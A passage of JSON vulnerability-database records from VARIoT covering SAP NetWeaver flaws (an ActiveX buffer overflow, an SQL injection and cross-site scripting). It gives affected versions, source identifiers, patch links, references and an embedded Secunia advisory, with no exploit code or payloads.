{
"db": "CNVD",
"id": "CNVD-2010-3251",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-939",
"trust": 0.7
},
{
"db": "XF",
"id": "64061",
"trust": 0.6
},
{
"db": "IVD",
"id": "0CB053F6-1FA6-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "96698",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "96901",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"db": "BID",
"id": "45396"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "PACKETSTORM",
"id": "96698"
},
{
"db": "PACKETSTORM",
"id": "96901"
},
{
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"id": "VAR-201012-0105",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
}
],
"trust": 1.12305582
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
}
]
},
"last_update_date": "2023-12-18T12:39:00.893000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NetWeaver Business Warehouse",
"trust": 0.8,
"url": "http://www.sap.com/solutions/sapbusinessobjects/data-warehousing/sapnetweaver-business-warehouse/index.epx"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://service.sap.com/sap/support/notes/1519966"
},
{
"title": "Patch for SAP NetWeaver Business Client ActiveX Control Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/2118"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "NVD",
"id": "CVE-2010-4556"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://service.sap.com/sap/support/notes/1519966"
},
{
"trust": 1.7,
"url": "http://www.zerodayinitiative.com/advisories/zdi-10-290/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/35796"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/45396"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1024890"
},
{
"trust": 1.6,
"url": "http://www.vupen.com/english/advisories/2010/3239"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64061"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4556"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4556"
},
{
"trust": 0.6,
"url": "http://seclists.org/fulldisclosure/2010/dec/327"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/64061"
},
{
"trust": 0.3,
"url": "http://support.microsoft.com/kb/240797"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-10-290"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=35796"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/35796/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/35796/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"db": "BID",
"id": "45396"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "PACKETSTORM",
"id": "96698"
},
{
"db": "PACKETSTORM",
"id": "96901"
},
{
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"db": "BID",
"id": "45396"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "PACKETSTORM",
"id": "96698"
},
{
"db": "PACKETSTORM",
"id": "96901"
},
{
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-12-15T00:00:00",
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"date": "2010-12-14T00:00:00",
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"date": "2010-12-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"date": "2010-12-14T00:00:00",
"db": "BID",
"id": "45396"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"date": "2010-12-15T00:50:06",
"db": "PACKETSTORM",
"id": "96698"
},
{
"date": "2010-12-23T06:20:40",
"db": "PACKETSTORM",
"id": "96901"
},
{
"date": "2010-12-17T19:00:24.213000",
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"date": "2010-12-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-12-14T00:00:00",
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"date": "2010-12-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"date": "2015-04-13T21:02:00",
"db": "BID",
"id": "45396"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"date": "2017-08-17T01:33:15.040000",
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"date": "2010-12-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "96698"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Business Client ActiveX Control Remote Code Execution Vulnerability",
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow",
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
],
"trust": 0.8
}
}
var-201709-1268
Vulnerability from variot
SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1268",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100911"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100911"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\nAn attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.",
"sources": [
{
"db": "BID",
"id": "100911"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100911",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100911"
}
]
},
"id": "VAR-201709-1268",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:02:25.544000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://help.sap.com/nw_platform"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2453642"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100911"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100911"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100911"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100911"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100911"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Unspecified SQL Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100911"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100911"
}
],
"trust": 0.3
}
}
var-201104-0314
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a security vulnerability in the SAP NetWeaver web application server. Some of the unknown input is before the returning user. ITS Mobile Start and ITS Mobile Test lack sufficient filtering for it, and the attacker can exploit the vulnerability for cross-site scripting attacks. In addition, SAP NetWeaver Portal incorrectly limits error messages, and an attacker submits a specially crafted HTTP request to obtain the actual absolute path of the installed component. SAP Netweaver is prone to multiple unspecified cross-site scripting vulnerabilities and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. The information-disclosure vulnerability can allow the attacker to obtain sensitive information that can aid in launching further attacks. ----------------------------------------------------------------------
A step-by-step discussion of the latest Flash Player 0-day exploit: http://secunia.com/blog/210
TITLE: SAP NetWeaver Web Application Server Cross-Site Scripting Vulnerabilities
SECUNIA ADVISORY ID: SA44205
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44205/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44205
RELEASE DATE: 2011-04-15
DISCUSS ADVISORY: http://secunia.com/advisories/44205/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/44205/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44205
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Onapsis has reported multiple vulnerabilities in SAP NetWeaver Web Application Server, which can be exploited by malicious people to conduct cross-site scripting attacks.
Certain unspecified input is not properly sanitised in the ITS Mobile Start and ITS Mobile Test services before being returned to the user.
Please see the vendor's advisory for a list of affected versions.
SOLUTION: Apply fixes (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY: Mariano Nunez Di Croce, Onapsis
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1512134
Onapsis: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-003 http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-004
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201104-0314",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "web application server",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0.10"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "web application server sp17",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "6.40"
},
{
"model": "web application server sp21",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "6.40"
},
{
"model": "web application server",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "6.10"
},
{
"model": "web application server",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "6.20"
},
{
"model": "web application server",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "6.40"
},
{
"model": "web application server",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.01*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "web application server sp17",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "6.40*"
},
{
"model": "web application server sp21",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "6.40*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "6.10*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "6.20*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "6.40*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.0*"
}
],
"sources": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"db": "BID",
"id": "47391"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mariano Nunez Di Croce and Jordan Santarsieri from Onapsis",
"sources": [
{
"db": "BID",
"id": "47391"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "73729efe-1f98-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a security vulnerability in the SAP NetWeaver web application server. Some of the unknown input is before the returning user. ITS Mobile Start and ITS Mobile Test lack sufficient filtering for it, and the attacker can exploit the vulnerability for cross-site scripting attacks. In addition, SAP NetWeaver Portal incorrectly limits error messages, and an attacker submits a specially crafted HTTP request to obtain the actual absolute path of the installed component. SAP Netweaver is prone to multiple unspecified cross-site scripting vulnerabilities and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. The information-disclosure vulnerability can allow the attacker to obtain sensitive information that can aid in launching further attacks. ----------------------------------------------------------------------\n\n\nA step-by-step discussion of the latest Flash Player 0-day exploit:\nhttp://secunia.com/blog/210\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Web Application Server Cross-Site Scripting\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA44205\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44205/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44205\n\nRELEASE DATE:\n2011-04-15\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44205/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44205/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44205\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nOnapsis has reported multiple vulnerabilities in SAP NetWeaver Web\nApplication Server, which can be exploited by malicious people to\nconduct cross-site scripting attacks. \n\nCertain unspecified input is not properly sanitised in the ITS Mobile\nStart and ITS Mobile Test services before being returned to the user. \n\nPlease see the vendor\u0027s advisory for a list of affected versions. \n\nSOLUTION:\nApply fixes (please see the vendor\u0027s advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nMariano Nunez Di Croce, Onapsis\n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1512134\n\nOnapsis:\nhttp://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-003\nhttp://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-004\n\nOTHER REFERENCES:\nFurther details available in Customer 